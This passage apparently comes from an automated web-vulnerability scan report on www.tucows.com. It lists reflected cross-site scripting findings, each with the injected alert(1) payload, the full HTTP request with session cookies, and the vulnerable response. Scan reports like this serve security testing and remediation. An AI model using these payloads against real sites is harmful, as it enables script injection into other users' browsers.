Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/x_core.js?d77ea"-alert(1)-"c2c5c57e4b0=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.286. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52264"-alert(1)-"ba7b1f5ec8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images52264"-alert(1)-"ba7b1f5ec8f/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images52264"-alert(1)-"ba7b1f5ec8f/newassets/includes/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.287. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83368"-alert(1)-"1009c251c75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets83368"-alert(1)-"1009c251c75/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets83368"-alert(1)-"1009c251c75/includes/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.288. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d685f"-alert(1)-"468f4a77932 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesd685f"-alert(1)-"468f4a77932/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesd685f"-alert(1)-"468f4a77932/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.289. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5e35"-alert(1)-"277a1eb2d25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/jsc5e35"-alert(1)-"277a1eb2d25/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/jsc5e35"-alert(1)-"277a1eb2d25/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.290. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b699"-alert(1)-"96b8d0b02cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/xdocsize.js6b699"-alert(1)-"96b8d0b02cb HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/xdocsize.js6b699"-alert(1)-"96b8d0b02cb";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.291. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5207"-alert(1)-"8d2e3d0b84e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/xdocsize.js?b5207"-alert(1)-"8d2e3d0b84e=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/xdocsize.js?b5207"-alert(1)-"8d2e3d0b84e=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.292. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3505f"-alert(1)-"50098cc31b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images3505f"-alert(1)-"50098cc31b/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images3505f"-alert(1)-"50098cc31b/newassets/includes/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.293. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24c7b"-alert(1)-"983752aa4e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets24c7b"-alert(1)-"983752aa4e5/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets24c7b"-alert(1)-"983752aa4e5/includes/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.294. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3dce"-alert(1)-"df3be201d5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesb3dce"-alert(1)-"df3be201d5f/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesb3dce"-alert(1)-"df3be201d5f/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.295. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53589"-alert(1)-"260f69e5fea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js53589"-alert(1)-"260f69e5fea/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js53589"-alert(1)-"260f69e5fea/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.296. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d6bc"-alert(1)-"8adb3574f02 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/yetii.js2d6bc"-alert(1)-"8adb3574f02 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

